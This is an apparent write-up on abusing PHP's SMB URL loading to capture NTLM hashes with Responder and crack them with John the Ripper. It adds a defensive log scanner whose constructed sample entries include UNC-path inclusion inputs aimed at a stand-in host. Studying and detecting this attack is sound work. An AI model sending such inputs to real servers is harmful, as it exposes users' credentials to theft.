# Responder

### Exploit NTLM using Responder:

In the PHP configuration file **php.ini**, the `allow_url_include` directive is set to "Off" by default, which means PHP does not load remote HTTP or FTP URLs. This prevents remote file inclusion attacks.

However, even if `allow_url_include` and `allow_url_fopen` are set to "Off", **PHP will not prevent the loading of SMB URLs.**

In our case, we can misuse this functionality **to steal the NTLM hash**. Using the example from this link, we can attempt to load an SMB URL and, in the process, capture the hashes from the target using Responder.
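The request that makes PHP load an SMB location has to carry a UNC or `smb://` path in a parameter, so it shows up in the web server's access log. The following is an added example (not from the original page) that flags such requests. The log lines, the `page` parameter name and the documentation-range addresses are constructed, and it assumes Windows treats both `\\host\share` and `//host/share` as UNC paths.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A value that starts with a UNC path (\\host\ or //host/) or an explicit smb:// URL.
UNC_RE = re.compile(r'^(?:[\\/]{2}[^\\/\s]+[\\/]|smb://)', re.IGNORECASE)
# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries: one benign, one plain UNC, one double-encoded UNC.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=//192.0.2.10/share/x HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=%255c%255c192.0.2.10%255cshare%255cx HTTP/1.1" 200 0',
]


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so a double-encoded backslash (%255c) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_unc_params(log_line):
    """Return [(param, decoded_value)] for query parameters that point at an SMB/UNC location."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value)  # parse_qsl already decoded one layer
        if UNC_RE.match(value):
            hits.append((name, value))
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for name, value in find_unc_params(line):
            print(f"UNC/SMB path in parameter {name!r}: {value}")
```

A hit here is a reason to check egress firewall logs for outbound TCP 445 from the web server around the same timestamp.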

### How does Responder work?

Responder can perform many different kinds of attacks, but for this scenario it sets up a malicious SMB server. When the target machine attempts NTLM authentication to that server, Responder sends a challenge back for the target to encrypt with the user's password. When the target responds, Responder uses the challenge and the encrypted response to generate the NetNTLMv2 hash. While we can't reverse the NetNTLMv2 hash, we can try many different common passwords to see if any generate the same challenge-response, and if we find one, we know that is the password. This is often referred to as hash cracking, which we'll do with a program called **John The Ripper.**

